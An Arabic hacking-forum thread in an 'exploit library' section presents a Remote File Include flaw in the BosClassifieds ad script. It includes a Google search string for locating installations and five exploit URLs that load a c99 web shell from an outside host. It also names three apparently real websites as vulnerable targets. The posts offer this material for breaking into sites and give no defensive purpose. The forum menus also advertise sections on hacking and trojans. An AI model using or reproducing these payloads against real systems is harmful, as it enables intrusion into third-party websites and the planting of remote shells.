ضع اعلانك هنا

ضع اعلانك هنا ضع اعلانك هنا منتديات بوابة الاسلام
التاريخ 2008-8-13 التاريخ 2008-8-15 ضع اعلانك هنا ضع اعلانك هنا
 
العودة   عالم المعرفة > قسم الأنظمة والسيرفرات > مكتبة الثغرات
تفعيل العضوية استرجاع كلمة المرور شروط المنتــدى البحث مشاركات اليوم اجعل كافة الأقسام مقروءة
مكتبة الثغرات ثغرات المواقع , ثغرات المنتديات ثغرات الأنظمة ثغرات مجلات , ثغرات البرامج و كيفية الاستغلال ,windows, linux, freebsd, DoS, Kernel, Local, buffer, overflow, auditing, spoofing, sniffer, sniffing, vulnerability, exploit
 

ثغره Remote File Include في نظام الاعلانات BosClassifieds

مكتبة الثغرات


إضافة رد
 
LinkBack أدوات الموضوع
 
قديم 07-08-2006, 01:22 AM   #1 (permalink)
XP

:: فريق عالم المعرفة::
 
الصورة الرمزية XP








XP غير متصل

XP has a spectacular aura aboutXP has a spectacular aura aboutXP has a spectacular aura about

افتراضي ثغره Remote File Include في نظام الاعلانات BosClassifieds

سلاااام عليكم


تطبيق الويب BosClassifieds Classified Ads System
عبارة عن نظام إعلاني يركب في المواقع لإعطاء الزوار والعملاء
امكانية الاعلان عن المنتجات و الوظائف الشاغره وغيرها تحت اقسام متنوعه
تم اكتشاف ثغرات امنية متعددة في التطبيق وهي من نوع الادراج عن بعد
يمكن من خلالها تنفيذ اي تطبيق شيل لإختراق المواقع.

اكتشاف: MazaGi


ملفات المصابه:
index.php
recent.php
account.php
classified.php
search.php
في كثير سكربتات مصابه بس انا حطيت اهمها


للبحث في قوقل:

كود PHP:
Powered by BosClassifieds Classified Ads System 
الاستغلال:



كود PHP:
http://www.site.com/[path]/index.php?insPath=http://www.powow.com/rem/c99shell.txt?
http://www.site.com/[path]/recent.php?insPath=http://www.powow.com/rem/c99shell.txt?
http://www.site.com/[path]/account.php?insPath=http://www.powow.com/rem/c99shell.txt?
http://www.site.com/[path]/classified.php?insPath=http://www.powow.com/rem/c99shell.txt?
http://www.site.com/[path]/search.php?insPath=http://www.powow.com/rem/c99shell.txt? 
وهذي مواقع مصابع بثغره
http://home.classified.ad/search.php.../c99shell.txt?
http://www.lafayettecentral.com/clas.../c99shell.txt?
http://campingmemberships.com/classi.../c99shell.txt?

التوقيع

(*) من سب صحابتي فعليه لعنة اللَّه والملائكة والناس أجمعين(*)
رواه الطبراني وهو في سلسلة الألباني الصحيحة

دعاءالشيخ خميس الزهراني

شروط التسجيل والكتابة في المنتدى

موضوع خطيرر تفضل بدخول

(اللهم أرزقنا قبل الموت توبه .. وعند الموت شهاده )

مركز تحميل الصور

 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 07-08-2006, 10:25 PM   #2 (permalink)
عضو جديد






فيصل الصقر غير متصل

فيصل الصقر will become famous soon enoughفيصل الصقر will become famous soon enough

افتراضي مشاركة: ثغره Remote File Include في نظام الاعلانات BosClassifieds

يعطيك العافية اخوي على المواضيع المميزة
اخوي بما انك خبير في البرامج ممكن اطلب منك المساعدة
انتظر ردك
وشكراً الف
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 07-24-2006, 05:30 AM   #3 (permalink)
دعم فنى
محترف تصميم






Losha غير متصل

Losha will become famous soon enoughLosha will become famous soon enough

افتراضي مشاركة: ثغره Remote File Include في نظام الاعلانات BosClassifieds

سلمت يا غالى
ومنك نتعلم الجديد

التوقيع


هناك من يمر بموضوعك ويكون في أشد الحاجة إليه ويمنعه ضيق
الوقت من الرد عليه ويكتفي بالدعاء لك في ظاهر الغيب


( فأجعل هذا هو هدفك الذي تطمح أليه )
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 08-05-2006, 06:00 PM   #4 (permalink)
عضو ذهبي
 
الصورة الرمزية فلسطين







فلسطين غير متصل

فلسطين will become famous soon enoughفلسطين will become famous soon enough

افتراضي مشاركة: ثغره Remote File Include في نظام الاعلانات BosClassifieds

تسلم عالثغرة

التوقيع

بسم الله الرحمن الرحيم
لا إله إلا الله محمداً رسول الله
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
إضافة رد





الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are متاحة

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
RSSMini Folder 1.0 (url) Remote File Include الماستر فؤاد مكتبة الثغرات 2 03-02-2007 07:25 AM
WMNews Remote File Include Vulnerability الماستر فؤاد مكتبة الثغرات 4 02-21-2007 12:28 PM
nabopoll 1.2 (survey.inc.php path) Remote File Include الماستر فؤاد مكتبة الثغرات 1 02-16-2007 12:30 AM
Fully Modded phpBB 2 Remote File Include lave84 مكتبة الثغرات 2 12-07-2006 04:02 AM
|| .. مـواقـع لـرفـع الـمـلـفـات وصـور .. || hadoley منتدى الكمبيوتر والانترنت والبرامج 5 08-14-2006 10:29 AM


الساعة الآن 06:55 AM.

عدد الكلمات الدلالية 70 الاكثر بحث في الموقع
الكلمات الدلالية
اخبار ادوات اطفال الاستثمار البرفست البيزون الدروس الروافض السعوديه السنه الشيعه العاب الفلاش الفوتو شوب الكويت المجوس المهدي الهكر ايران برامج برامج اختراق برامج هكر بنات تحميل تشفير تشقير الصفحات تطوير تعليم ثغره جرائم جوال حماية حوار دروس دومين رواتر شرح صميم صوره فضائح فيديو كتاب كراك كمبيوتر محاضرات منتدى مودم نطاق نطاقات نوكيا هوز bifrost buffer crypter domain downloader exploit file inclusion iran local overflow poison python server shellcode sql injection trojan version vulnerability youtube


روابط مهمة

أقسام المنتدى


الرسول الإنسان | الدفاع عن أهل السنة | فضائح و جرائم الروافض | السنه | الحوارات الهادفة | الفلاش والسويتش | الفوتوشوب | دورة الفوتوشوب | صور | العاب | البرامج المشروحه | الفرفشه والمرح | الرياضة | الفايروسات | الهاردوير والصيانة | تطوير المنتديات والمواقع | دورة تطوير منتديات vb | الحمايه | اختراق المواقع والسيرفرات | هكرز | اختراق الشات والاميل | ثغرات | البرامج | الفيجوال بيسك | المواضيع العامه | القصص واللغات|  شات


Powered by vBulletin Version 3.7.1
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd
لا تتحمل إدارة منتديات عالم المعرفة أية مسؤولية حول أي موضوع يطرح في المنتدى فإن المكتوب يعبر عن رأى صاحبه أو ناقلة

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58